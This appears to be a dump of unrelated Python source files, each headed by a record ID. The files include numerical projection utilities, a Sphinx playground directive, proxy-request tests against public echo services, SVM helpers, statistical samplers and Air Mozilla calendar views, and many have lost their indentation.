# compute the projection by thresholding v using theta
w = (v - theta).clip(min=0)
return w
def projection_simplex_sort(v, z=1):
n_features = v.shape[0]
u = numpy.sort(v)[::-1]
cssv = numpy.cumsum(u) - z
ind = numpy.arange(n_features) + 1
cond = u - cssv / ind > 0
rho = ind[cond][-1]
theta = cssv[cond][-1] / float(rho)
w = numpy.maximum(v - theta, 0)
return w
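# Editorial sanity-check sketch (not part of the original module): the sorted
# simplex projection returns a non-negative vector that sums to z.
def _example_projection_simplex_sort():
    v = numpy.array([0.5, 2.0, -1.0])
    w = projection_simplex_sort(v, z=1)
    assert numpy.all(w >= 0)
    assert abs(w.sum() - 1.0) < 1e-9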
def projection_simplex_pivot(v, z=1, random_state=None):
rs = numpy.random.RandomState(random_state)
n_features = len(v)
U = numpy.arange(n_features)
s = 0
rho = 0
while len(U) > 0:
G = []
L = []
k = U[rs.randint(0, len(U))]
ds = v[k]
for j in U:
if v[j] >= v[k]:
if j != k:
ds += v[j]
G.append(j)
elif v[j] < v[k]:
L.append(j)
drho = len(G) + 1
if s + ds - (rho + drho) * v[k] < z:
s += ds
rho += drho
U = L
else:
U = G
theta = (s - z) / float(rho)
return numpy.maximum(v - theta, 0)
def projection_simplex_bisection(v, z=1, tau=0.0001, max_iter=1000):
lower = 0
upper = numpy.max(v)
current = numpy.inf
    for it in range(max_iter):
if numpy.abs(current) / z < tau and current < 0:
break
theta = (upper + lower) / 2.0
w = numpy.maximum(v - theta, 0)
current = numpy.sum(w) - z
if current <= 0:
upper = theta
else:
lower = theta
return w
def project_ball(array, epsilon=1, ord=2):
"""
Compute the orthogonal projection of the input tensor (as vector) onto the L_ord epsilon-ball.
**Assumes the first dimension to be batch dimension, which is preserved.**
:param array: array
:type array: numpy.ndarray
:param epsilon: radius of ball.
:type epsilon: float
:param ord: order of norm
:type ord: int
    :return: projected array
    :rtype: numpy.ndarray
"""
assert isinstance(array, numpy.ndarray), 'given tensor should be numpy.ndarray'
if ord == 0:
assert epsilon >= 1
size = array.shape
flattened_size = numpy.prod(numpy.array(size[1:]))
array = array.reshape(-1, flattened_size)
sorted = numpy.sort(array, axis=1)
k = int(math.ceil(epsilon))
thresholds = sorted[:, -k]
mask = (array >= expand_as(thresholds, array)).astype(float)
array *= mask
elif ord == 1:
size = array.shape
flattened_size = numpy.prod(numpy.array(size[1:]))
array = array.reshape(-1, flattened_size)
for i in range(array.shape[0]):
# compute the vector of absolute values
u = numpy.abs(array[i])
# check if v is already a solution
if u.sum() <= epsilon:
# L1-norm is <= s
continue
# v is not already a solution: optimum lies on the boundary (norm == s)
# project *u* on the simplex
#w = project_simplex(u, s=epsilon)
w = projection_simplex_sort(u, z=epsilon)
# compute the solution to the original problem on v
w *= numpy.sign(array[i])
array[i] = w
if len(size) == 4:
array = array.reshape(-1, size[1], size[2], size[3])
elif len(size) == 2:
array = array.reshape(-1, size[1])
elif ord == 2:
size = array.shape
flattened_size = numpy.prod(numpy.array(size[1:]))
array = array.reshape(-1, flattened_size)
clamped = numpy.clip(epsilon/numpy.linalg.norm(array, 2, axis=1), a_min=None, a_max=1)
clamped = clamped.reshape(-1, 1)
array = array * clamped
if len(size) == 4:
array = array.reshape(-1, size[1], size[2], size[3])
elif len(size) == 2:
array = array.reshape(-1, size[1])
elif ord == float('inf'):
array = numpy.clip(array, a_min=-epsilon, a_max=epsilon)
else:
raise NotImplementedError()
return array
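# Editorial sanity-check sketch (not part of the original module): after
# projection onto the L2 ball of radius 1, no row of the batch has norm
# larger than 1, and rows already inside the ball are left untouched.
def _example_project_ball():
    batch = numpy.array([[3.0, 4.0], [0.1, 0.1]])
    projected = project_ball(batch.copy(), epsilon=1, ord=2)
    assert numpy.linalg.norm(projected, ord=2, axis=1).max() <= 1 + 1e-8
    assert numpy.allclose(projected[1], batch[1])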
def project_sphere(array, epsilon=1, ord=2):
"""
    Rescale the input tensor (as a batch of vectors) to lie on the L_ord epsilon-sphere,
    i.e. each row is normalized to have norm exactly epsilon.
    **Assumes the first dimension to be batch dimension, which is preserved.**
    :param array: array
    :type array: numpy.ndarray
    :param epsilon: radius of sphere.
    :type epsilon: float
    :param ord: order of norm
    :type ord: int
    :return: projected array
    :rtype: numpy.ndarray
"""
assert isinstance(array, numpy.ndarray), 'given tensor should be numpy.ndarray'
size = array.shape
flattened_size = numpy.prod(numpy.array(size[1:]))
array = array.reshape(-1, flattened_size)
array = array/numpy.linalg.norm(array, axis=1, ord=ord).reshape(-1, 1)
array *= epsilon
if len(size) == 4:
array = array.reshape(-1, size[1], size[2], size[3])
elif len(size) == 2:
array = array.reshape(-1, size[1])
return array
def project_orthogonal(basis, vectors, rank=None):
"""
Project the given vectors on the basis using an orthogonal projection.
:param basis: basis vectors to project on
:type basis: numpy.ndarray
:param vectors: vectors to project
:type vectors: numpy.ndarray
:return: projection
:rtype: numpy.ndarray
"""
# The columns of Q are an orthonormal basis of the columns of basis
Q, R = numpy.linalg.qr(basis)
if rank is not None and rank > 0:
Q = Q[:, :rank]
# As Q is orthogonal, the projection is
beta = Q.T.dot(vectors)
projection = Q.dot(beta)
return projection
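# Editorial sanity-check sketch (not part of the original module): the
# residual of an orthogonal projection is orthogonal to the basis columns.
def _example_project_orthogonal():
    basis = numpy.random.randn(10, 3)
    vectors = numpy.random.randn(10, 5)
    projection = project_orthogonal(basis, vectors)
    assert numpy.allclose(basis.T.dot(vectors - projection), 0)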
def project_lstsq(basis, vectors):
"""
Project using least squares.
:param basis: basis vectors to project on
:type basis: numpy.ndarray
:param vectors: vectors to project
:type vectors: numpy.ndarray
:return: projection
:rtype: numpy.ndarray
"""
x, _, _, _ = numpy.linalg.lstsq(basis, vectors)
projection = basis.dot(x)
return projection
def angles(vectors_a, vectors_b):
"""
Compute angle between two sets of vectors.
See https://people.eecs.berkeley.edu/~wkahan/Mindless.pdf.
:param vectors_a:
:param vectors_b:
:return:
"""
if len(vectors_b.shape) == 1:
vectors_b = vectors_b.reshape(-1, 1)
# Normalize vector
norms_a = numpy.linalg.norm(vectors_a, ord=2, axis=0)
norms_b = numpy.linalg.norm(vectors_b, ord=2, axis=0)
norms_a = numpy.repeat(norms_a.reshape(1, -1), vectors_a.shape[0], axis=0)
norms_b = numpy.repeat(norms_b.reshape(1, -1), vectors_b.shape[0], axis=0)
vectors_a /= norms_a
vectors_b /= norms_b
term_1 = numpy.multiply(vectors_a, norms_b) - numpy.multiply(vectors_b, norms_a)
term_1 = numpy.linalg.norm(term_1, ord=2, axis=0)
term_2 = numpy.multiply(vectors_a, norms_b) + numpy.multiply(vectors_b, norms_a)
term_2 = numpy.linalg.norm(term_2, ord=2, axis=0)
angles = 2*numpy.arctan2(term_1, term_2)
return angles
def normalized_non_maximum_entropy_detector(probabilities):
indices = numpy.argmax(probabilities, axis=1)
normalized_probabilities = numpy.copy(probabilities)
normalized_probabilities[numpy.arange(probabilities.shape[0]), indices] = 0
normalized_probabilities = normalized_probabilities/numpy.sum(normalized_probabilities, axis=1).reshape(-1, 1)
from scipy.special import xlogy
confidences = - numpy.sum(xlogy(normalized_probabilities, normalized_probabilities), axis=1)
#confidences /= math.log(probabilities.shape[1])
return confidences
def max_detector(probabilities):
return numpy.max(probabilities, axis=1)
|
497077 | from docutils import nodes
from docutils.parsers.rst import Directive
from docutils.parsers.rst import directives
import urllib.parse
icon = '<svg version="1.1" width="16" height="16" class="octicon octicon-file-code" viewBox="0 0 16 16" aria-hidden="true"><path fill-rule="evenodd" d="M4 1.75C4 .784 4.784 0 5.75 0h5.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v8.586A1.75 1.75 0 0114.25 15h-9a.75.75 0 010-1.5h9a.25.25 0 00.25-.25V6h-2.75A1.75 1.75 0 0110 4.25V1.5H5.75a.25.25 0 00-.25.25v2.5a.75.75 0 01-1.5 0v-2.5zm7.5-.188V4.25c0 .138.112.25.25.25h2.688a.252.252 0 00-.011-.013l-2.914-2.914a.272.272 0 00-.013-.011zM5.72 6.72a.75.75 0 000 1.06l1.47 1.47-1.47 1.47a.75.75 0 101.06 1.06l2-2a.75.75 0 000-1.06l-2-2a.75.75 0 00-1.06 0zM3.28 7.78a.75.75 0 00-1.06-1.06l-2 2a.75.75 0 000 1.06l2 2a.75.75 0 001.06-1.06L1.81 9.25l1.47-1.47z"></path></svg>'
def lazy_iframe(iframe):
return f"""
<div class="lazy-iframe" style="min-height:1px">
<script>
(() => {{
const element = document.currentScript.parentElement;
window.addEventListener("scroll", check);
window.addEventListener("DOMContentLoaded", check);
window.addEventListener("click", check);
if (element.closest(".tabbed-content")) {{
const label = element.closest(".tabbed-content").previousSibling
label.innerHTML = `{icon}` + `<span> ${{label.innerText}} </span>`
}}
function check() {{
setTimeout(() => {{
const rect = element.getBoundingClientRect();
const isVisible = rect.top - window.innerHeight < 500 &&
rect.bottom > -50 &&
rect.width > 0;
if (isVisible) {{
element.outerHTML = `{iframe}`
}}
}}, 100)
}}
}})();
</script>
</div>
"""
def playground(code, height, interactive):
query = urllib.parse.urlencode({"code": code})
src = f'https://playground.clio-lang.org/?hz=true&{query}'
if not interactive:
src += "&run=no&examples=no&share=no&console=no"
params = 'class="playground" loading="lazy" allow="clipboard-read; clipboard-write"'
iframe = f'<iframe {params} src="{src}" width="100%" height="{height}px" frameborder="no"></iframe>'
return lazy_iframe(iframe)
class Playground(Directive):
has_content = True
required_arguments = 0
optional_arguments = 0
option_spec = {'height': directives.nonnegative_int,
'no-interactive': directives.flag}
def run(self):
code = "\n".join(self.content)
        height = self.options.get('height') or 540
interactive = 'no-interactive' not in self.options
raw = playground(code, height, interactive)
node = nodes.raw("", raw, format='html')
return [node]
def setup(app):
app.add_directive("playground", Playground)
return {
'version': '0.1',
'parallel_read_safe': True,
'parallel_write_safe': True,
}
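# Editorial usage sketch (not part of the original extension): assuming this
# module is importable as "playground" (hypothetical package name), a Sphinx
# project would enable it from conf.py and use it from reStructuredText
# roughly as follows; the embedded clio code is elided.
#
#     # conf.py
#     extensions = ["playground"]
#
#     .. playground::
#        :height: 300
#        :no-interactive:
#
#        <clio code to embed>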
|
497107 | VERSION_MAJOR = "0"
VERSION_MINOR = "5"
VERSION_TINY = "0"
VERSION = "%s.%s.%s" % (VERSION_MAJOR, VERSION_MINOR, VERSION_TINY)
|
497108 | for i in range(1, 100):
    if i % 15 == 0:
        print("FizzBuzz,", end=' ')
    elif i % 3 == 0:
        print("Fizz,", end=' ')
    elif i % 5 == 0:
        print("Buzz,", end=' ')
    else:
        print(str(i) + ",", end=' ')
print("Buzz") |
497133 | import pytest
from socket import inet_aton
from uuid import uuid4
from proxy_requests import ProxyRequests, ProxyRequestsBasicAuth
from proxy_requests import requests
# pytest -rsA tests/test_proxy_requests.py
@pytest.fixture
def henry_post_bucket():
url = 'https://ptsv2.com/t/%s' % str(uuid4()).replace('-', '')
requests.get(url)
return url
def test_get():
r = ProxyRequests('https://api.ipify.org')
r.get()
assert r.get_status_code() == 200
try:
inet_aton(r.__str__())
except Exception:
pytest.fail('Invalid IP address in response')
print(r.get_proxy_used())
def test_get_with_headers():
h = {'User-Agent': 'NCSA Mosaic/3.0 (Windows 95)'}
r = ProxyRequests('https://postman-echo.com/headers')
r.set_headers(h)
r.get_with_headers()
assert r.get_status_code() == 200
assert 'headers' in r.get_json()
print(r.get_proxy_used())
def test_post(henry_post_bucket):
r = ProxyRequests(henry_post_bucket + '/post')
r.post({'key1': 'value1', 'key2': 'value2'})
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(r.get_proxy_used())
def test_post_with_headers(henry_post_bucket):
r = ProxyRequests(henry_post_bucket + '/post')
r.set_headers({'name': 'rootVIII', 'secret_message': '7Yufs9KIfj33d'})
r.post_with_headers({'key1': 'value1', 'key2': 'value2'})
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(r.get_proxy_used())
def test_post_file(henry_post_bucket):
with open('/var/tmp/proxy_requests_testing.txt', 'w') as f_out:
f_out.write('testing')
r = ProxyRequests(henry_post_bucket + '/post')
r.set_file('/var/tmp/proxy_requests_testing.txt')
r.post_file()
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(henry_post_bucket)
print(r.get_proxy_used())
def test_post_file_with_headers(henry_post_bucket):
with open('/var/tmp/proxy_requests_testing.txt', 'w') as f_out:
f_out.write('testing')
h = {'User-Agent': 'NCSA Mosaic/3.0 (Windows 95)'}
r = ProxyRequests(henry_post_bucket + '/post')
r.set_headers(h)
r.set_file('/var/tmp/proxy_requests_testing.txt')
r.post_file_with_headers()
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(henry_post_bucket)
print(r.get_proxy_used())
def test_get_with_basic_auth():
url = 'https://postman-echo.com/basic-auth'
r = ProxyRequestsBasicAuth(url, 'postman', 'password')
r.get()
assert r.get_status_code() == 200
assert r.get_json()['authenticated']
print(r.get_proxy_used())
def test_get_with_headers_basic_auth():
url = 'https://postman-echo.com/basic-auth'
h = {'User-Agent': 'NCSA Mosaic/3.0 (Windows 95)'}
r = ProxyRequestsBasicAuth(url, 'postman', 'password')
r.set_headers(h)
r.get_with_headers()
assert r.get_status_code() == 200
assert r.get_json()['authenticated']
print(r.get_proxy_used())
def test_post_with_basic_auth(henry_post_bucket):
r = ProxyRequestsBasicAuth(henry_post_bucket + '/post', 'username', 'password')
r.post({'key1': 'value1', 'key2': 'value2'})
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(henry_post_bucket)
print(r.get_proxy_used())
def test_post_with_headers_and_basic_auth(henry_post_bucket):
r = ProxyRequestsBasicAuth(henry_post_bucket + '/post', 'username', 'password')
r.set_headers({'header_key': 'header_value'})
r.post_with_headers({'key1': 'value1', 'key2': 'value2'})
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(henry_post_bucket)
print(r.get_proxy_used())
def test_post_file_with_basic_auth(henry_post_bucket):
with open('/var/tmp/proxy_requests_testing.txt', 'w') as f_out:
f_out.write('testing')
r = ProxyRequestsBasicAuth(henry_post_bucket + '/post', 'username', 'password')
r.set_file('/var/tmp/proxy_requests_testing.txt')
r.post_file()
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(henry_post_bucket)
print(r.get_proxy_used())
def test_post_file_with_headers_and_basic_auth(henry_post_bucket):
with open('/var/tmp/proxy_requests_testing.txt', 'w') as f_out:
f_out.write('testing')
h = {'User-Agent': 'NCSA Mosaic/3.0 (Windows 95)'}
r = ProxyRequestsBasicAuth(henry_post_bucket + '/post', 'username', 'password')
r.set_headers(h)
r.set_file('/var/tmp/proxy_requests_testing.txt')
r.post_file_with_headers()
assert r.get_status_code() == 200
assert 'Thank you' in r.__str__()
print(henry_post_bucket)
print(r.get_proxy_used())
|
497145 | import numpy as np
import matplotlib.pyplot as plt
import os
from sklearn import svm
from sklearn.decomposition import PCA
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import MinMaxScaler
from sklearn.externals import joblib
import torch
import torchvision
def load(dataloader):
"""Loads/flattens inputs and targets for use in SVM. Returns inputs and targets."""
for data in dataloader:
x,y=data
x=x.view(x.shape[0],-1)
return x,y
def hp_grid(n_components, C_range, gamma_range):
"""Creates and returns list of classifiers with grid of hyperparameters given by C_range and gamma_range."""
clfs=[]
pca=PCA(n_components=n_components)
scaling = MinMaxScaler(feature_range=(-1,1))
for i in C_range:
for j in gamma_range:
svc=svm.SVC(C=i, gamma=j)
clf=make_pipeline(pca, scaling, svc)
clfs.append(clf)
return clfs
def train_grid(clfs, inputs, targets):
"""Trains classifiers in a list; returns list of trained classifiers."""
fitted_clfs=[]
for i in range(len(clfs)):
x=clfs[i].fit(inputs, targets)
fitted_clfs.append(x)
print('Fitted: ', i+1, '/', len(clfs))
return fitted_clfs
def predict_eval(clf, inputs, targets, training=False):
"""Given a classifier and inputs, returns predictions and evaluated classifier accuracy."""
preds=clf.predict(inputs)
num_correct=torch.eq(torch.from_numpy(preds), targets).sum().item()
acc=(num_correct/len(targets))*100
if training:
print('C: ', clf.get_params(deep=True)['svc__C'], 'gamma: ', clf.get_params(deep=True)['svc__gamma'])
print('Training Accuracy: ', acc)
else:
print('Testing Accuracy: ', acc)
return preds, acc
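# Editorial usage sketch (not part of the original module): a tiny grid on
# random data, only to show how hp_grid / train_grid / predict_eval fit
# together; the shapes and hyperparameter ranges are arbitrary.
def _example_svm_grid():
    inputs = np.random.randn(60, 20)
    targets = torch.randint(0, 2, (60,))
    clfs = hp_grid(n_components=5, C_range=[1.0], gamma_range=[0.01, 0.1])
    fitted = train_grid(clfs, inputs, targets.numpy())
    return predict_eval(fitted[0], inputs, targets, training=True)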
def maxacc_gen(test_accs, train_accs, clfs):
"""Finds and returns model with highest test accuracy and model with train/test accuracy ratio closest to 1."""
test=np.array(test_accs)
train=np.array(train_accs)
maxacc=clfs[np.argmax(test)]
gen=clfs[np.argmin(train-test)]
return maxacc, gen
def save_proba(fn, pipe, inputs, targets):
"""Fits svm with probabilities and saves to disk."""
params=pipe.get_params(deep=True)
pca=PCA(n_components=180)
scaling = MinMaxScaler(feature_range=(-1,1))
pipe_prob=make_pipeline(pca, scaling, svm.SVC(C=params['svc__C'], gamma=params['svc__gamma'], probability=True))
pipe_prob.fit(inputs, targets)
joblib.dump(pipe_prob, fn)
def load_svm(directory, gen=True):
"""Returns loaded SVM saved with classification baselines.
'gen' : Model with train/test accuracy ratio closest to 1.
'maxacc' : Model with highest test accuracy."""
if gen:
clf='gen'
if not gen:
clf='maxacc'
dataset=directory.split('/')[-1]
path='SVM' + dataset + '_' + clf + '_proba.pkl'
svm=joblib.load(os.path.join(directory, path))
return svm
def class_acc(preds, targets, classes):
"Returns classifier accuracy for each class."
correct=0
class_correct=np.zeros(len(classes))
class_total=np.zeros(len(classes))
for j in range(len(targets)):
class_total[targets[j]]+=1
if np.argmax(preds[j])==targets[j]:
class_correct[targets[j]]+=1
correct+=1
class_accuracies=(class_correct/class_total)*100
accuracy=(correct/len(targets))*100
for i in range(len(class_accuracies)):
print('Accuracy of', classes[i], ': ', class_accuracies[i], '%')
print('Total Accuracy: ', accuracy, '%')
|
497223 | import numpy as np
from scipy.stats import norm as ndist
# randomization mechanism
class normal_sampler(object):
"""
Our basic model for noise, and input to
selection algorithms. This represents
Gaussian data with a center, e.g. X.T.dot(y)
in linear regression and a covariance Sigma.
This object emits noisy versions of `center` as
center + scale * N(0, Sigma)
"""
def __init__(self, center, covariance):
'''
Parameters
----------
center : np.float(p)
Center of Gaussian noise source.
covariance : np.float((p, p))
Covariance of noise added (up to scale factor).
'''
(self.center,
self.covariance) = (np.asarray(center),
np.asarray(covariance))
self.shape = self.center.shape
def __call__(self, size=None, scale=1.):
'''
Parameters
----------
size : tuple or int
How many copies to draw
scale : float
Scale (in data units) applied to unitless noise before adding.
Returns
-------
noisy_sample : np.float
Generate noisy version of the center. With scale==0.,
return the full center.
TODO: for some calculations, a log of each call would be helpful
for constructing UMVU, say.
'''
if not hasattr(self, 'cholT'):
self.cholT = np.linalg.cholesky(self.covariance).T
if type(size) == type(1):
size = (size,)
size = size or (1,)
if self.shape == ():
_shape = (1,)
else:
_shape = self.shape
return scale * np.squeeze(np.random.standard_normal(size + _shape).dot(self.cholT)) + self.center
class split_sampler(object):
"""
Data splitting noise source.
This is approximately
Gaussian with center np.sum(sample_stat, 0)
and noise suitably scaled, depending
on splitting fraction.
This object emits noisy versions of `center` as
center + scale * N(0, Sigma)
"""
def __init__(self, sample_stat, covariance): # covariance of sum of rows
'''
Parameters
----------
sample_stat : np.float((n, p))
Data matrix. In linear regression this is X * y[:, None]
covariance : np.float((p, p))
Covariance of np.sum(sample_stat, 0). Could be computed
e.g. by bootstrap or parametric method given a design X.
'''
self.sample_stat = np.asarray(sample_stat)
self.nsample = self.sample_stat.shape[0]
self.center = np.sum(self.sample_stat, 0)
self.covariance = covariance
self.shape = self.center.shape
def __call__(self, size=None, scale=0.5):
'''
Parameters
----------
size : tuple or int
How many copies to draw
scale : float
Scale (in data units) applied to unitless noise before adding.
Returns
-------
noisy_sample : np.float
Generate noisy version of the center. With scale==0.,
return the full center.
The equivalent data splitting fraction is 1 / (scale**2 + 1).
Argument is kept as `scale` instead of `frac` so that the general
learning algorithm can replace this `splitter_source` with a corresponding
`normal_source`.
TODO: for some calculations, a log of each call would be helpful
for constructing UMVU, say.
'''
# (1 - frac) / frac = scale**2
frac = 1 / (scale**2 + 1)
if type(size) == type(1):
size = (size,)
size = size or (1,)
if self.shape == ():
_shape = (1,)
else:
_shape = self.shape
final_sample = []
idx = np.arange(self.nsample)
        for _ in range(np.prod(size)):
sample_ = self.sample_stat[np.random.choice(idx, int(frac * self.nsample), replace=False)]
final_sample.append(np.sum(sample_, 0) / frac) # rescale to the scale of a sum of nsample rows
val = np.squeeze(np.array(final_sample).reshape(size + _shape))
return val
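# Editorial usage sketch (not part of the original module): with scale=0 a
# normal_sampler returns its center exactly; with scale>0 it adds Gaussian
# noise with the supplied covariance. The center/covariance below are made up.
def _example_normal_sampler():
    center = np.array([1.0, -2.0])
    covariance = np.array([[1.0, 0.3], [0.3, 2.0]])
    sampler = normal_sampler(center, covariance)
    assert np.allclose(sampler(scale=0.), center)
    assert sampler(size=5, scale=1.).shape == (5, 2)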
|
497285 | from torchsupport.data.namedtuple import namedtuple
class Environment:
data_type = namedtuple("Data", [
"state", "action", "rewards", "done"
])
def reset(self):
raise NotImplementedError
def push_changes(self):
pass
def pull_changes(self):
pass
def action_space(self):
raise NotImplementedError
def observation_space(self):
raise NotImplementedError
def is_done(self):
raise NotImplementedError
def observe(self):
raise NotImplementedError
def act(self, action):
raise NotImplementedError
def schema(self):
raise NotImplementedError
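# Editorial sketch (not part of the original module): a trivial concrete
# Environment, only to illustrate which methods a subclass is expected to
# implement; the constant observations and 10-step episode are made up.
class _ConstantEnvironment(Environment):
    def __init__(self):
        self.steps = 0
    def reset(self):
        self.steps = 0
    def action_space(self):
        return 1
    def observation_space(self):
        return 1
    def is_done(self):
        return self.steps >= 10
    def observe(self):
        return 0.0
    def act(self, action):
        self.steps += 1
    def schema(self):
        # fields: state, action, rewards, done
        return self.data_type(0.0, 0, 0.0, False)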
|
497335 | import sys
from easyprocess import EasyProcess
python = sys.executable
prog = """
import time
for i in range(3):
print(i, flush=True)
time.sleep(1)
"""
print("-- no timeout")
stdout = EasyProcess([python, "-c", prog]).call().stdout
print(stdout)
print("-- timeout=1.5s")
stdout = EasyProcess([python, "-c", prog]).call(timeout=1.5).stdout
print(stdout)
print("-- timeout=50s")
stdout = EasyProcess([python, "-c", prog]).call(timeout=50).stdout
print(stdout)
|
497344 | def serialize_sqla(data, serialize_date=True):
"""
    Serialization function to serialize any dicts or lists.
This is needed for conversion of sqlalchemy objects to JSON format.
"""
# If has to_dict this is asumed working and it is used
if hasattr(data, 'to_dict'):
return data.to_dict(serialize_date=serialize_date)
# DateTime objects should be returned as isoformat
if hasattr(data, 'isoformat') and serialize_date:
return str(data.isoformat())
    # Items in lists are iterated over and serialized separately
if isinstance(data, (list, tuple, set)):
return [serialize_sqla(item, serialize_date=serialize_date) for item in
data]
# Dictionaries get iterated over
if isinstance(data, dict):
result = {}
for key, value in list(data.items()):
result[key] = serialize_sqla(value, serialize_date=serialize_date)
return result
    # Try using the built-in __dict__ attribute and serialize that separately
if hasattr(data, '__dict__'):
return serialize_sqla(data.__dict__, serialize_date=serialize_date)
# Just hope it works
return data
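# Editorial usage sketch (not part of the original module): nested containers
# are walked recursively and date/datetime values are rendered via isoformat.
def _example_serialize_sqla():
    import datetime
    data = {"when": datetime.date(2020, 1, 2), "tags": ("a", "b")}
    assert serialize_sqla(data) == {"when": "2020-01-02", "tags": ["a", "b"]}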
|
497346 | from pydantic import Field
from app.schemas.base import AbstractResourceModel, APIModel
from app.schemas.mixin import TimestampMixin
class BaseHTML(APIModel):
id: str = Field(..., title="SHA256", alias="sha256")
class HTML(AbstractResourceModel, TimestampMixin):
"""HTML"""
id: str = Field(..., title="SHA256", alias="sha256")
ssdeep: str = Field(...)
|
497362 | import unittest
from unittest.mock import patch
from leetcode.coding.editor import edit
class TestEditor(unittest.TestCase):
@patch('leetcode.coding.editor.os.chdir')
@patch('leetcode.coding.editor.subprocess.call')
@patch('leetcode.coding.editor.os.environ.get')
def test_edit(self, mock_get, mock_call, mock_chdir):
mock_get.return_value = ''
edit('', None)
mock_call.assert_not_called()
mock_get.return_value = 'sublime'
edit('file', None)
mock_call.assert_called_once_with('subl file', shell=True)
mock_get.return_value = 'vim'
mock_call.reset_mock()
with patch('leetcode.coding.editor.delay_refresh_detail') as mock_delay:
edit('file', None)
mock_call.assert_called_once_with('vim file', shell=True)
mock_delay.assert_called_once()
|
497470 | import datetime
import vobject
from django import http
from django.shortcuts import get_object_or_404, render
from django.utils.timezone import utc
from django.utils import timezone
from django.core.cache import cache
from django.conf import settings
from django.db.models import Q
from django.core.urlresolvers import reverse
from slugify import slugify
from jsonview.decorators import json_view
from airmozilla.base.utils import get_base_url
from airmozilla.main.templatetags.jinja_helpers import short_desc
from airmozilla.main.models import (
Event,
get_profile_safely,
Location,
Channel,
)
from airmozilla.search.models import SavedSearch
from airmozilla.main.views import is_contributor
from airmozilla.main import forms
def calendar(request):
context = {}
return render(request, 'main/calendar.html', context)
@json_view
def calendar_data(request):
form = forms.CalendarDataForm(request.GET)
if not form.is_valid():
return http.HttpResponseBadRequest(str(form.errors))
start = form.cleaned_data['start']
end = form.cleaned_data['end']
start = start.replace(tzinfo=utc)
end = end.replace(tzinfo=utc)
privacy_filter = {}
privacy_exclude = {}
events = Event.objects.scheduled_or_processing()
if request.user.is_active:
if is_contributor(request.user):
privacy_exclude = {'privacy': Event.PRIVACY_COMPANY}
else:
privacy_filter = {'privacy': Event.PRIVACY_PUBLIC}
events = events.approved()
if privacy_filter:
events = events.filter(**privacy_filter)
elif privacy_exclude:
events = events.exclude(**privacy_exclude)
events = events.filter(
start_time__gte=start,
start_time__lt=end
)
event_objects = []
for event in events.select_related('location'):
start_time = event.start_time
end_time = start_time + datetime.timedelta(
seconds=max(event.duration or event.estimated_duration, 60 * 20)
)
        # 'end' is only an estimate: we use the real duration when known,
        # otherwise the estimated duration, with a 20 minute minimum.
event_objects.append({
'title': event.title,
'start': start_time.isoformat(),
'end': end_time.isoformat(),
'url': reverse('main:event', args=(event.slug,)),
'description': short_desc(event),
'allDay': False,
})
return event_objects
def calendars(request):
data = {}
locations = []
now = timezone.now()
time_ago = now - datetime.timedelta(days=30)
base_qs = Event.objects.filter(start_time__gte=time_ago)
for location in Location.objects.all().order_by('name'):
count = base_qs.filter(location=location).count()
if count:
locations.append(location)
data['locations'] = locations
if request.user.is_active:
profile = get_profile_safely(request.user)
if profile and profile.contributor:
data['calendar_privacy'] = 'contributors'
else:
data['calendar_privacy'] = 'company'
else:
data['calendar_privacy'] = 'public'
return render(request, 'main/calendars.html', data)
def events_calendar_ical(request, privacy=None, channel_slug=None):
cache_key = 'calendar'
savedsearch = None
if privacy:
cache_key += '_%s' % privacy
if channel_slug:
cache_key += '_%s' % channel_slug
if request.GET.get('ss'):
savedsearch = get_object_or_404(SavedSearch, id=request.GET['ss'])
cache_key += '_%s' % savedsearch.pk
if request.GET.get('location'):
if request.GET.get('location').isdigit():
location = get_object_or_404(
Location,
pk=request.GET.get('location')
)
else:
location = get_object_or_404(
Location,
name=request.GET.get('location')
)
cache_key += str(location.pk)
cached = None
else:
location = None
cached = cache.get(cache_key)
if cached:
# additional response headers aren't remembered so add them again
cached['Access-Control-Allow-Origin'] = '*'
return cached
cal = vobject.iCalendar()
now = timezone.now()
if savedsearch:
base_qs = savedsearch.get_events()
else:
base_qs = Event.objects.scheduled_or_processing()
if channel_slug:
channel = get_object_or_404(
Channel,
slug__iexact=channel_slug
)
channels = Channel.objects.filter(
Q(id=channel.id) |
Q(parent=channel.id)
)
base_qs = base_qs.filter(channels__in=channels)
if privacy == 'public':
base_qs = base_qs.approved().filter(
privacy=Event.PRIVACY_PUBLIC
)
title = 'Air Mozilla Public Events'
elif privacy == 'private':
base_qs = base_qs.exclude(
privacy=Event.PRIVACY_PUBLIC
)
title = 'Air Mozilla Private Events'
else:
title = 'Air Mozilla Events'
if savedsearch:
if savedsearch.name:
title += ' (from saved search "{}")'.format(savedsearch.name)
else:
title += ' (from saved search)'
if location:
base_qs = base_qs.filter(location=location)
cal.add('X-WR-CALNAME').value = title
events = list(base_qs
.filter(start_time__lt=now)
.order_by('-start_time')[:settings.CALENDAR_SIZE])
events += list(base_qs
.filter(start_time__gte=now)
.order_by('start_time'))
base_url = get_base_url(request)
for event in events:
vevent = cal.add('vevent')
vevent.add('summary').value = event.title
vevent.add('dtstart').value = event.start_time
vevent.add('dtend').value = (
event.start_time +
datetime.timedelta(
seconds=event.duration or event.estimated_duration
)
)
vevent.add('description').value = short_desc(event, strip_html=True)
if event.location:
vevent.add('location').value = event.location.name
vevent.add('url').value = (
base_url + reverse('main:event', args=(event.slug,))
)
icalstream = cal.serialize()
# response = http.HttpResponse(
# icalstream,
# content_type='text/plain; charset=utf-8'
# )
response = http.HttpResponse(
icalstream,
content_type='text/calendar; charset=utf-8'
)
filename = 'AirMozillaEvents%s' % (privacy and privacy or '')
if location:
filename += '_%s' % slugify(location.name)
if savedsearch:
filename += '_ss%s' % savedsearch.id
filename += '.ics'
response['Content-Disposition'] = (
'inline; filename=%s' % filename)
if not location:
cache.set(cache_key, response, 60 * 10) # 10 minutes
# https://bugzilla.mozilla.org/show_bug.cgi?id=909516
response['Access-Control-Allow-Origin'] = '*'
return response
|
497513 | import torch
import torch.nn as nn
from torchvision.models import vgg16
class Vgg16(torch.nn.Module):
def __init__(self):
super(Vgg16, self).__init__()
features = list(vgg16(pretrained=True).features)[:23]
self.layers = nn.ModuleList(features).eval()
